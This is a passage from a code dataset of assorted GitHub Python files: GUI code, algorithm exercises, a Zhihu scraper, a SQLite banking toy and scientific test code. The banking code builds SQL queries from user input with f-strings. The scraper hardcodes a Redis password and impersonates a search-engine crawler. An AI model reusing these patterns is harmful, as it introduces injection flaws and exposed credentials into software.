CONNECTOR_ICON_FILENAME\n                                              )\n                    ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\ndef settings_action( parent\n                   , callback = (lambda event: print(\"Settings Clicked\"))\n                   , text = \"Settings\"\n                   , checkable = False\n                   , checked = False\n                   , icon_path = os.path.join( ICON_DIRECTORY\n                                             , WRENCH_ICON_FILENAME\n                                             )\n                   ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\n\n    # actions\n    # , left_spacer = False\n    # , right_spacer = False\n\ndef sidebar():\n    return QtGui.QToolBar()\n    # bar.setOrientation(Qt.Qt.Vertical)\n    # return bar\n    # if left_spacer:\n    #     left_spacer = QWidget()\n    #     left_spacer.setSizePolicy( QtGui.QSizePolicy.Expanding\n    #                              , 
QtGui.QSizePolicy.Expanding\n    #                              )\n    #     toolbar.addWidget(left_spacer)\n\n    # for action in actions:\n    #     toolbar.addAction(action(toolbar))\n\n    # if right_spacer:\n    #     right_spacer = QWidget()\n    #     right_spacer.setSizePolicy( QtGui.QSizePolicy.Expanding\n    #                              , QtGui.QSizePolicy.Expanding\n    #                              )\n    #     toolbar.addWidget(right_spacer)\n\n    # return toolbar\n\n\n\n\n# def connect_action():\n\n# def settings_action():\n\n\n\ndef main():\n    app = QtGui.QApplication(sys.argv)\n    window = QtGui.QMainWindow()\n    widget = SettingsDialog.SettingsWidget({\n        'LeakyIaF':['Vm'],\n        'Compartment':['Vm','Im'],\n        'HHChannel':['Ik','Gk'],\n        'ZombiePool':['n','conc'],\n        'ZombieBufPool':['n','conc'],\n        'HHChannel2D':['Ik','Gk'],\n        'CaConc':['Ca']\n        })\n    d = QDialog()\n    l = QHBoxLayout()\n    d.setLayout(l)\n    l.addWidget(widget)\n    bar = sidebar()\n    bar.addAction(mode_action(bar))\n    bar.addAction(connector_action(bar))\n    bar.addAction(settings_action(bar, d.show))\n    window.addToolBar(bar)\n    window.show()\n    sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n    main()\n\n# # spacer widget for left\n# # spacer widget for right\n# # you can't add the same widget to both left and right. you need two different widgets.\n# right_spacer = QtGui.QWidget()\n# right_spacer.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n\n# # here goes the left one\n# # toolbar.addWidget(left_spacer)\n# # some dummy actions\n\n\n\n# ################################################################################\n# # Hand Tool\n# ################################################################################\n\n\n\n\n\n","repo_name":"BhallaLab/moose","sub_path":"moose-gui/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"}
+{"seq_id":"29554715838","text":"'''\nFirst attempt\n\nfrom collections import deque\n\ndef bfs(graph,target,queue,depth):\n    print(depth,\":\",queue)\n    next_queue = deque() # queue for the next depth\n    \n    while(queue): # inspect every node of this level, i.e. the queue built at the previous depth\n        temp_word = queue.popleft()\n        if temp_word == target: # if it matches, return this level (depth), i.e. the number of steps taken\n            return depth\n        else : # otherwise just keep pushing its neighbors into next_queue\n            next_queue.extend(graph[temp_word])\n    \n    return bfs(graph,target,next_queue,depth+1)\n    \n\ndef solution(begin, target, words):\n    if target not in words:\n        return 0\n    \n    graph = {}\n    \n    for word in words :\n        # a word differing in exactly one letter adds exactly one new character,\n        # so the union of the two letter sets should have length 3 + 1 = 4\n        graph[word] = [i for i in words if len(set(word).union(set(i))) == 4] \n    \n    first_queue = deque([i for i in words if len(set(begin).union(set(i)))==4])\n    \n    answer = bfs(graph,target,first_queue,1)\n    \n    return answer\n\ntest case\nbegin = \"hit\"\ntarget = \"hhh\"\nwords = [\"hhh\",\"hht\"]\nFailed.\n\nI overlooked that the union can end up smaller than 4 when a word contains repeated letters.\n'''\n\n# my own solution\nfrom collections import deque\n\ndef bfs(graph,target,queue,depth):\n    next_queue = deque() # queue for the next depth\n    \n    while(queue): # inspect every node of this level, i.e. the queue built at the previous depth\n        temp_word = queue.popleft()\n        if temp_word == target: # if it matches, return this level (depth), i.e. the number of steps taken\n            return depth\n        else : # otherwise just keep pushing its neighbors into next_queue\n            next_queue.extend(graph[temp_word])\n    \n    return bfs(graph,target,next_queue,depth+1) # tried tail recursion here\n    \n\ndef solution(begin, target, words):\n    if target not in words:\n        return 0\n    \n    words.insert(0,begin)\n    \n    graph = {}\n    \n    for one in words:\n        adj = []\n        for another in words:\n            dif = 0\n            for i in range(len(one)):\n                if one[i] != another[i] :\n                    dif +=1\n                    if dif == 2: # break out of the loop once the difference reaches 2, to avoid unnecessary work\n                        break\n            if dif == 1:\n                adj.append(another)\n        graph[one] = adj\n    \n    \n    first_queue = deque(graph[begin])\n    \n    answer = bfs(graph,target,first_queue,1)\n    \n    return answer","repo_name":"SeongIkKim/ALtudy","sub_path":"Programers/03.DFS&BFS/word_transition.py","file_name":"word_transition.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42290147093","text":"n = int(input())\n\ncheck = [0 for i in range(n+1)]\nnodes = []\n\nfor i in range(n-1):\n    u,v = map(int,input().split())\n    nodes.append((u,v))\n    check[u]+=1\n    check[v]+=1\n\nleft = 0; right = n-2\nfor u,v in nodes:\n    if check[u]==1 or check[v]==1:\n        print(left)\n        left+=1\n    else:\n        print(right)\n        right-=1\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1325C. Ehab and Path-etic MEXs.py","file_name":"1325C. Ehab and Path-etic MEXs.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"10722529032","text":"import json\ndef create():\n    with open('t&p.json','r') as f1:\n        r=json.load(f1)\n    with open('t&p.json','w') as f:\n        a1=int(input('enter your phone no'))\n        a={\n            'name':input('enter your name '),\n            'email':input('enter your email'),\n            'password':input('enter your password')\n        }\n        r[a1]=a\n        json.dump(r,f,indent=4)\ndef remove():\n    with open('t&p.json','r') as f1:\n        r=json.load(f1)\n    with open('t&p.json','w') as f:\n        m1=int(input('enter your phone no'))\n        del r[str(m1)]\n        json.dump(r,f,indent=4)\n\ndef read():\n    m1=int(input('enter your phone number'))\n    with open('t&p.json','r') as f:\n        fo=json.load(f)\n        for a,b in (fo.items()):\n            if a==str(m1):\n                print(b)\n                return 1\n\nwhile True:\n    print(\"\"\"\n    press 1 for read\n    press 2 for create\n    press 3 for Update\n    press 4 for delete\n    press 5 for exit\n    \"\"\")\n    m=int(input())\n    if m==1:\n        #m1=int(input('enter your phone number '))\n        read()\n    elif m==2:\n        #m1=int(input('enter your phone number '))\n        create()\n    elif m==3:\n        a=read()\n        if a==1:\n            create()\n        else:\n            print('does not exist')\n    elif m==4:\n        remove()\n    elif m==5:\n        break\n    \n","repo_name":"PK2173/data","sub_path":"snake/gitup.py","file_name":"gitup.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6308090997","text":"from hashlib import sha1\nfrom urllib.parse import urljoin\n\nimport re\n\nimport pickle\nimport redis\nimport requests\nimport zlib\nfrom bs4 import BeautifulSoup\n\n\ndef main():\n    headers = {'user-agent': 'Baiduspider'}\n    proxies = {'http': 'http://122.114.31.177:808'}\n    join_url = urljoin('https://www.zhihu.com/', '/explore')\n    get_url = requests.get(join_url, headers=headers, proxies=proxies)\n    decode_html = get_url.content.decode('utf-8')\n    soup_obj = BeautifulSoup(decode_html, 'lxml')\n    href_regex = re.compile(r'^/question')\n    a_tags = soup_obj.find_all('a', {'href': href_regex})\n    base_hrefs = set()\n    for a_tag in a_tags:\n        all_href = a_tag.attrs['href']\n        full_hrefs = urljoin('https://www.zhihu.com/', all_href)\n        base_hrefs.add(full_hrefs)\n    print(base_hrefs)\n    redis_client = redis.Redis(host='47.98.173.29', port=6379, password=123456)\n    # turn each url into a sha1 digest to use as the Redis hash field\n    hashe_proto = sha1()\n    for base_href in base_hrefs:\n        # hash a fresh copy of the prototype so every url gets its own digest\n        hasher = hashe_proto.copy()\n        hasher.update(base_href.encode('utf-8'))\n        field_key = hasher.hexdigest()\n        
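# field_key is a 40-character hex digest unique to this url; it is used
        # below to skip pages that are already cached in the 'zhihu' Redis hash
        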
print(base_href)\n        if not redis_client.hexists('zhihu', field_key):\n            html_page = requests.get(base_href, headers=headers).text\n            zipped_page = zlib.compress(pickle.dumps(html_page))\n            redis_client.hset('zhihu', field_key, zipped_page)\n    print('Total %d question pages found.' % redis_client.hlen('zhihu'))\n\n\nif __name__ == '__main__':\n    main()\n\n\n# hash.digest()\n# returns the digest as a binary string\n# hash.hexdigest()\n# returns the digest as a hexadecimal string\n","repo_name":"judong-520/net_spider","sub_path":"practice/work07.py","file_name":"work07.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15894333634","text":"import random\nfrom .luhnAlgo import Luhn\nimport sqlite3\n\n\nclass BankAccount:\n    \"\"\"\n    A simple bank account with a card number, a PIN and a balance.\n    \"\"\"\n\n    def __init__(self,\n                 cardNumber=None,\n                 pin=None,\n                 balance=0):\n        self.ID = None\n        self.cardNumber = cardNumber\n        self.pin = pin\n        self.balance = balance\n\n    def createAccount(self):\n        IIN = str(400000)\n        self.ID = str(random.randint(0, 999999999))\n        AccountNumber = IIN + \"0\" * (9 - len(self.ID)) + self.ID\n\n        self.cardNumber = Luhn().create(accountNumber=AccountNumber)\n        tempPIN = str(random.randint(0, 9999))\n        self.pin = \"0\" * (4 - len(tempPIN)) + tempPIN\n        return self.ID, self.cardNumber, self.pin\n\n    def __repr__(self):\n        return f\"Bank Account ID: {self.ID}\\n\" \\\n               f\"Bank Account number: {self.cardNumber}\\n\" \\\n               f\"Pin Number: {self.pin}\\n\" \\\n               f\"Balance: {self.balance}\"\n\n\nclass Menu:\n    \"\"\"\n    Show the main menu of the Banking System\n    \"\"\"\n\n    def __init__(self):\n        self._choice = '0'\n\n    def __repr__(self):\n        return f\"Current choice: {self._choice}\"\n\n    def __eq__(self, other):\n        return self._choice == other\n\n    @staticmethod\n    def _show_main_menu():\n        print('1. Create an account')\n        print('2. Log into account')\n        print('0. Exit')\n\n    @staticmethod\n    def _show_account_menu():\n        print(\"1. Balance\")\n        print('2. Add income')\n        print('3. Do transfer')\n        print('4. Close account')\n        print('5. Log out')\n        print('0. 
Exit')\n\n def show_and_get_choice(self):\n if self._choice.startswith('2'):\n self._show_account_menu()\n self._choice = f'{self._choice[0]}.{input()}'\n else:\n self._show_main_menu()\n self._choice = input()\n\n def back_to_main(self):\n self._choice = '0'\n\n\nclass Database:\n \"\"\"\n SQLite Database Operation object\n\n --------\n Method:\n\n * add(self, account): add new account to database\n * get(self, cardNumber): get the account details from database by it's cardNumber\n * close(self, number): DELETE the cardNumber record in database\n * updateBalance(self, number, balance): UPDATE the account balance in database\n \"\"\"\n\n def __init__(self):\n self.conn = sqlite3.connect('card.s3db')\n self.cursor = self.conn.cursor()\n try:\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS card\n (id INTEGER, number TEXT, pin TEXT, balance INTEGER DEFAULT 0)\n \"\"\")\n except sqlite3.OperationalError:\n pass\n\n def add(self, account):\n self.cursor.execute(\n f\"INSERT INTO card VALUES ({account.ID}, {account.cardNumber}, \\\n {account.pin}, {account.balance})\")\n self.conn.commit()\n\n def get(self, cardNumber):\n acc = self.cursor.execute(\n f\"SELECT * FROM card WHERE number={cardNumber}\").fetchone()\n if acc:\n account = BankAccount()\n account.ID, account.cardNumber, account.pin, account.balance = acc\n return account\n return None\n\n def close(self, number):\n self.cursor.execute(f\"DELETE FROM card WHERE number = {number}\")\n self.conn.commit()\n\n def updateBalance(self, number, balance):\n self.cursor.execute(\n f\"UPDATE card SET balance = {balance} WHERE number = {number}\")\n self.conn.commit()\n\n\nclass BankingSystem:\n \"\"\"\n Simple Banking System\n \"\"\"\n\n def __init__(self):\n self.menu = Menu()\n self.db = Database()\n self.current_account = None\n\n def createAccount(self):\n account = BankAccount()\n account.createAccount()\n self.db.add(account=account)\n print('\\nYour card has been created')\n print('Your card number:')\n print(f'{account.cardNumber}')\n print('Your card PIN:')\n print(f'{account.pin}\\n')\n\n def login(self):\n print(\"\\nEnter your card number:\")\n number = input()\n print('Enter your PIN:')\n pin = input()\n account = self.db.get(cardNumber=number)\n if account:\n if account.pin == pin:\n print('\\nYou have successfully logged in!\\n')\n self.current_account = account\n return\n print('\\nWrong card number or PIN!\\n')\n self.menu.back_to_main()\n\n def showBalance(self):\n print(f\"\\nBalance: {self.current_account.balance}\\n\")\n\n def addIncome(self):\n print('\\nEnter income:')\n income = int(input())\n self.current_account.balance += income\n self.db.updateBalance(\n number=self.current_account.cardNumber,\n balance=self.current_account.balance)\n print('Income was added!\\n')\n\n def transfer(self):\n print('\\nTransfer\\nEnter card number:')\n number = input()\n if Luhn().validate(number):\n account = self.db.get(cardNumber=number)\n if account:\n print(\"Enter how much money you want to transfer:\")\n transfer = int(input())\n if self.current_account.balance >= transfer:\n self.db.updateBalance(\n number=number, balance=account.balance + transfer)\n print(\n f'>>> num: {self.current_account.cardNumber} bal: {self.current_account.balance}')\n self.current_account.balance -= transfer\n self.db.updateBalance(\n self.current_account.cardNumber,\n self.current_account.balance)\n print(\n f'>>> num: {self.current_account.cardNumber} bal: {self.current_account.balance}')\n print('Success!\\n')\n else:\n print('Not enough 
money!\n')\n            else:\n                print('Such a card does not exist.\n')\n        else:\n            print('Probably you made a mistake in the card number. Please try again!\n')\n\n    def closeAccount(self):\n        self.db.close(self.current_account.cardNumber)\n        print('\nThe account has been closed!\n')\n\n    def logOut(self):\n        print('\nYou have successfully logged out!\n')\n        self.menu.back_to_main()\n\n    def main(self):\n        while True:\n            self.menu.show_and_get_choice()\n            if self.menu == '1':\n                self.createAccount()\n            elif self.menu == '2':\n                self.login()\n            elif self.menu == '2.1':\n                self.showBalance()\n            elif self.menu == '2.2':\n                self.addIncome()\n            elif self.menu == '2.3':\n                self.transfer()\n            elif self.menu == '2.4':\n                self.closeAccount()\n            elif self.menu == '2.5':\n                self.logOut()\n            else:\n                print('\nBye!')\n                break\n","repo_name":"JL1829/SimpleBankingSystem","sub_path":"src/bankingSystem.py","file_name":"bankingSystem.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18777190653","text":"\"\"\"\n=================\nAn animated image\n=================\n\nThis example demonstrates how to animate an image.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport h5py\n\n\n\nclass Visualize:\n    def __init__(self, filename, timesteps):\n        self.file = h5py.File(filename+\".hdf5\", \"r\")\n        self.i = 0\n        self.fig = plt.figure()\n        self.im = plt.imshow(np.random.random((100,100)), animated=True)\n        # keep a reference on self, otherwise the animation object is\n        # garbage-collected when __init__ returns and the updates stop\n        self.ani = animation.FuncAnimation(self.fig, self.updatefig, frames=timesteps - 2, interval=0, blit=True, repeat=False)\n        plt.show(block=False)\n\n\n    def updatefig(self, *args):\n        try:\n            self.im.set_array(self.file['test'+str(self.i)])\n            self.i += 1\n            print(self.file['wind'+str(self.i)][0])\n            return self.im,\n        except KeyError:  # no more frames in the file\n            input(\"Press Enter to continue...\")\n            return\n\n\n","repo_name":"masenov/gas-drone-simulation","sub_path":"python/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41931187951","text":"#!/bin/python3\n# coding:utf-8\n\nfrom CFdef import *\n\ndef menu(): # main menu\n\n    choice = str()\n    \n    print(\"option : \")\n    print(\"new | modify | delete | show | quit \\n\")\n    choice = input(\"What to do ... 
: \")\n\n    return choice\n\nprint(\"Welcome to the BMEC archive manager\\n\")\n\nwhile True: # infinite loop\n\n    choice = menu()\n\n    if choice == \"new\":\n        newSave()\n\n    elif choice == \"modify\":\n        modifySave()\n\n    elif choice == \"delete\":\n        delSave()\n\n    elif choice == \"show\":\n        showSaves()\n\n    elif choice == \"quit\":\n        quit()\n\n    else:\n        print(\"argument invalid ...\")\n\n        continue","repo_name":"Neltarim/archiveManager","sub_path":"SaveConfig/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31793748096","text":"import sys\nsys.path.append(\".\")\nimport os\nimport numpy as np\n\nfrom qatools import *\n\nfrom lumopt.utilities.load_lumerical_scripts import load_from_lsf\nfrom lumopt.utilities.wavelengths import Wavelengths\nfrom lumopt.utilities.materials import Material\nfrom lumopt.geometries.polygon import FunctionDefinedPolygon\nfrom lumopt.figures_of_merit.modematch import ModeMatch\nfrom lumopt.optimizers.generic_optimizers import ScipyOptimizers\nfrom lumopt.optimization import Optimization\n\nclass TestOptimizationParallelPlateWaveguideTE(TestCase):\n    \"\"\" \n    Unit test for the Optimization class. It performs a sanity check that the optimizer converges using a\n    simple parallel plate waveguide filled by a dielectric. The waveguide has a gap that must be filled\n    all the way by the polygon under optimization to maximize transmission.\n\n    There are two independent methods in the code base to compute the gradient of the figure of merit:\n    1) using the permittivity derivatives calculated directly from meshing (use_deps == True) and\n    2) using the shape derivative approximation described in Owen Miller's thesis (use_deps == False).\n    Both methods are tested here using exactly the same structure.\n    \"\"\"\n\n    file_dir = os.path.abspath(os.path.dirname(__file__))\n\n    def setUp(self):\n        # Base simulation script\n        self.base_script = load_from_lsf(os.path.join(self.file_dir, 'optimization_parallel_plate_waveguide_TE_base.lsf'))\n        # Simulation bandwidth\n        self.wavelengths = Wavelengths(start = 1500e-9,\n                                       stop = 1600e-9,\n                                       points = 11)\n        # Polygon defining a rectangle that can grow or shrink along the y-axis to fill the gap\n        self.mesh_del = 10.0e-9 # must be kept in synch with self.base_script\n        initial_points_y = np.array([0.01 * self.mesh_del, 1.75 * self.mesh_del])\n        def wall(param = initial_points_y):\n            assert param.size == 2, \"walls defined by two points.\"\n            self.wg_gap = 10.0 * self.mesh_del # must be kept in synch\n            points_x = 0.5 * np.array([-self.wg_gap, self.wg_gap, self.wg_gap, -self.wg_gap])\n            points_y = np.array([-param[0], -param[1], param[1], param[0]])\n            polygon_points = [(x, y) for x, y in zip(points_x, points_y)]\n            return np.array(polygon_points)\n        self.wg_width = 50.0 * self.mesh_del # must be kept in synch\n        bounds = [(0.0, self.wg_width / 2.0)] * initial_points_y.size \n        self.geometry = FunctionDefinedPolygon(func = wall, \n                                               initial_params = initial_points_y, \n                                               bounds = bounds,\n                                               z = 0.0, # must be kept in synch\n                                               depth = self.wg_width, # must be kept in synch\n                                               eps_out = 1.0 ** 2, # must be kept in synch\n                                               eps_in = Material(base_epsilon = 4.0 ** 2, name = '', mesh_order = 1), # must be kept in synch\n                                               edge_precision = 50,\n                                               dx = 1.0e-10)\n        # Figure of merit\n        self.fom = ModeMatch(monitor_name = 'fom', # must be kept in synch\n                             mode_number = 1, # must be kept in synch\n                             direction = 'Forward',\n                             multi_freq_src = True,\n                             target_T_fwd = lambda wl: np.ones(wl.size),\n                             norm_p = 1)\n        # Scipy optimizer\n        self.optimizer = ScipyOptimizers(max_iter = 5, \n                                         method = 'L-BFGS-B',\n                                         scaling_factor = 1.0e6,\n                                         pgtol = 1.0e-5,\n                                         ftol = 1.0e-12,\n                                         target_fom = 0.0,\n                                         scale_initial_gradient_to = None)\n\n    def test_permittivity_derivatives_in_2D(self):\n        print(\"2D optimization with permittivity derivatives (use_deps = True): \")\n        opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','2D');\", \n                           wavelengths = self.wavelengths,\n                           fom = self.fom,\n                           geometry = self.geometry,\n                           optimizer = self.optimizer,\n                           use_var_fdtd = False,\n                           hide_fdtd_cad = True,\n                           use_deps = True,\n                           plot_history = False,\n                           store_all_simulations = False)\n        fom, params = opt.run()\n        self.assertGreaterEqual(fom, 0.99991)\n        self.assertAlmostEqual(params[0], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n        self.assertAlmostEqual(params[1], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n\n    def test_permittivity_derivatives_in_3D(self):\n        print(\"3D optimization with permittivity derivatives (use_deps = True): \")\n        opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','3D');\", \n                           wavelengths = self.wavelengths,\n                           fom = self.fom,\n                           geometry = self.geometry,\n                           optimizer = self.optimizer,\n                           hide_fdtd_cad = True,\n                           use_deps = True,\n                           plot_history = False,\n                           store_all_simulations = False)\n        fom, params = opt.run()\n        self.assertGreaterEqual(fom, 0.99991)\n        self.assertAlmostEqual(params[0], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n        self.assertAlmostEqual(params[1], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n\n    def test_shape_boundary_approximation_in_2D(self):\n        print(\"2D optimization with shape boundary approximation (use_deps = False): \")\n        self.geometry.bounds = [(0.0, self.wg_width / 2.0 - self.mesh_del)] * len(self.geometry.bounds)\n        # Note: bounds are tweaked since the shape boundary approximation method does not work\n        # when the shape under optimization touches the boundary of the FDTD region.\n        opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','2D');\", \n                           wavelengths = self.wavelengths,\n                           fom = self.fom,\n                           geometry = self.geometry,\n                           optimizer = self.optimizer,\n                           hide_fdtd_cad = True,\n                           use_deps = False,\n                           plot_history = False,\n                           store_all_simulations = False)\n        fom, params = opt.run()\n        self.assertGreaterEqual(fom, 0.972)\n        self.assertAlmostEqual(params[0], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n        self.assertAlmostEqual(params[1], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n\n    def test_shape_boundary_approximation_in_3D(self):\n        print(\"3D optimization with shape boundary approximation (use_deps = False): \")\n        self.geometry.bounds = [(0.0, self.wg_width / 2.0 - self.mesh_del)] * len(self.geometry.bounds)\n        # Note: bounds are tweaked since the shape boundary approximation method does not work\n        # when the shape under optimization touches the boundary of the FDTD region.\n        opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','3D');\", \n                           wavelengths = self.wavelengths,\n                           fom = self.fom,\n                           geometry = self.geometry,\n                           optimizer = self.optimizer,\n                           hide_fdtd_cad = True,\n                           use_deps = False,\n                           plot_history = False,\n                           store_all_simulations = False)\n        fom, params = opt.run()\n        self.assertGreaterEqual(fom, 0.972)\n        self.assertAlmostEqual(params[0], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n        
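# at the optimum both polygon points are driven to the tweaked upper bound,
        # i.e. half the waveguide width minus one mesh cell
        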
self.assertAlmostEqual(params[1], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n\nif __name__ == \"__main__\":\n    run([__file__])","repo_name":"chriskeraly/lumopt","sub_path":"QA/optimization_parallel_plate_waveguide_TE_test.py","file_name":"optimization_parallel_plate_waveguide_TE_test.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"3"}
+{"seq_id":"35398060344","text":"from typing import Any, Union, Tuple\nimport numpy as np\nfrom ..encoder.base import Encoder\nfrom ..goboard import Move\nfrom ..gotypes import Player, Point\n\"\"\"\nWithout having seen the sequence of past moves, it is impossible to detect ko from\nthe current board position alone. If we encode the board with `OnePlaneEncoder`,\nusing a single plane where black stones are -1, white stones are 1 and empty points\nare 0, ko can never be recognised.\n\nSimpleEncoder uses 11 planes. Besides encoding ko explicitly, it also models the\nnumber of liberties each stone has left, distinguishing black stones from white\nones. A stone with only one liberty left may be captured on the very next turn, so\nit carries extra tactical weight. Because the model can `see` this property\ndirectly, it can more easily learn how it influences the game. Dedicating separate\nfeature planes to ko and to liberties effectively gives the model a hint,\nemphasising how important these concepts are.\n\"\"\"\n\n\nclass SimpleEncoder(Encoder):\n    \"\"\"\n    0 - black stones with 1 liberty left encoded as 1, everything else 0\n    1 - black stones with 2 liberties encoded as 1, everything else 0\n    2 - black stones with 3 liberties encoded as 1, everything else 0\n    3 - black stones with 4 (or more) liberties encoded as 1, everything else 0\n    4 - white stones with 1 liberty left encoded as 1, everything else 0\n    5 - white stones with 2 liberties encoded as 1, everything else 0\n    6 - white stones with 3 liberties encoded as 1, everything else 0\n    7 - white stones with 4 (or more) liberties encoded as 1, everything else 0\n    8 - this plane is set to 1 if it is black's turn\n    9 - this plane is set to 1 if it is white's turn\n    10 - points that cannot be played because of ko\n    \"\"\"\n\n    def __init__(self, board_size: Union[Tuple[int, int], int]) -> None:\n        if isinstance(board_size, int):\n            board_size = (board_size, board_size)\n        self.board_width, self.board_height = board_size\n        self.num_planes = 11\n\n    def name(self) -> str:\n        return 'simple'\n\n    def encode(self, game_state: Any) -> np.ndarray:\n        \"\"\"\n        Args:\n            game_state: the game state\n\n        Returns:\n            board_tensor: [num_planes=11, board_height, board_width]\n        \"\"\"\n        board_tensor = np.zeros(self.shape())\n        if game_state.next_player == Player.black:\n            # plane 8 - set to 1 if it is black's turn\n            board_tensor[8] = 1\n        else:\n            # plane 9 - set to 1 if it is white's turn\n            board_tensor[9] = 1\n        # walk over every point on the board\n        for r in range(self.board_height):\n            for c in range(self.board_width):\n                p = Point(row=r + 1, col=c + 1)\n                go_string = game_state.board.get_go_string(p)\n\n                if go_string is None:\n                    # plane 10 - points that cannot be played because of ko\n                    if game_state.does_move_violate_ko(game_state.next_player,\n                                                       Move.play(p)):\n                        board_tensor[10][r][c] = 1\n                else:\n                    liberty_plane = min(4, go_string.num_liberties) - 1\n                    if go_string.color == Player.white:\n                        liberty_plane += 4\n                    board_tensor[liberty_plane][r][c] = 1\n\n        return board_tensor\n\n    def encode_point(self, point: Point) -> int:\n        \"\"\"\n        Convert a board intersection (point) into an integer index.\n\n        point -> index\n        \"\"\"\n        return self.board_width * (point.row - 1) + (point.col - 1)\n\n    def decode_point_index(self, index: int) -> Point:\n        \"\"\"\n        Convert an integer index into a board intersection (point).\n\n        index -> point\n        \"\"\"\n        row = index // self.board_width\n        col = index % self.board_width\n        return Point(row=row + 1, col=col + 1)\n\n    def num_points(self) -> int:\n        \"\"\"\n        Total number of intersections on the board, i.e. width x height.\n        \"\"\"\n        return self.board_width * self.board_height\n\n    def shape(self) -> Tuple[int, int, int]:\n        \"\"\"\n        Shape of the encoded board.\n\n        Returns:\n            [num_planes=11, board_height, board_width]\n        \"\"\"\n        return self.num_planes, self.board_height, self.board_width\n\n\ndef create(board_size: Union[Tuple[int, int], int]) -> SimpleEncoder:\n    \"\"\"\n    Create a SimpleEncoder.\n    \"\"\"\n    return 
SimpleEncoder(board_size)","repo_name":"relaxdl/relaxml","sub_path":"relaxml/relaxgo/encoder/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19556835959","text":"from typing import List\n\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n d = dict()\n for num in nums:\n left, right = num, num\n if num + 1 in d and d[num + 1] > num:\n right = d[num + 1]\n del d[num + 1]\n if num - 1 in d and d[num - 1] < num:\n left = d[num - 1]\n del d[num - 1]\n if left == right:\n if left not in d:\n d[left] = left\n else:\n if left not in d or right > d[left]:\n d[left] = right\n\n if right not in d or left < d[right]:\n d[right] = left\n max = 0\n for key in d:\n v = d[key] - key + 1\n if max < v:\n max = v\n return max\n\n\nif __name__ == '__main__':\n s = Solution()\n a = [-7, -1, 3, -9, -4, 7, -3, 2, 4, 9, 4, -9, 8, -7, 5, -1, -7]\n re = s.longestConsecutive(a)\n print(re)\n","repo_name":"jackmiking/leetcode","sub_path":"LongestConsecutive.py","file_name":"LongestConsecutive.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36506493598","text":"\nimport numpy as np\n\nx1=open('X-auxilary.csv','w')\n\ndef distance(pt_1, pt_2):\n\tdist=np.sqrt((pt_2[0]-pt_1[0])**2+(pt_2[1]-pt_1[1])**2)\n\treturn dist\n\nwell_1=[1,1]\nwell_2=[15,1]\nwell_3=[15,55]\nwell_4=[1,55]\nboundry=[15,55]\n\n\n\nposition_file = open('/media/nandita/ND/Research/1_CNN_infill/spe10model2/SPE10 MODEL2 UPSCALED/data/position_file.txt','r')\nposition_infil = position_file.readlines()\nfor i in position_infil:\n\tparts=i.split(';')\n\txin=int(parts[0])\n\tyin=int(parts[1])\n\tinfil_well=[xin,yin]\n\tdw1=distance(well_1,infil_well)\n\tdw2=distance(well_2,infil_well)\n\tdw3=distance(well_3,infil_well)\n\tdw4=distance(well_4,infil_well)\n\tdw5=distance(boundry,infil_well)\n\t\n\tx1.write(str(dw1) + ',' + str(dw2) + ',' + str(dw3) + ',' + str(dw4) + ',' + str(dw5))\n\tx1.write('\\n')\n\t\nx1.close()","repo_name":"nanditadoloi/cnn-infill-optimization","sub_path":"Reference/X-auxilary.py","file_name":"X-auxilary.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29027637317","text":"import pytest\n\nfrom django.core.exceptions import ValidationError\n\nfrom kelvin.courses.models.criterion.action import validate_actions\n\n\nclass TestActionValidator:\n def test_invalid_my_action(self):\n with pytest.raises(ValidationError):\n 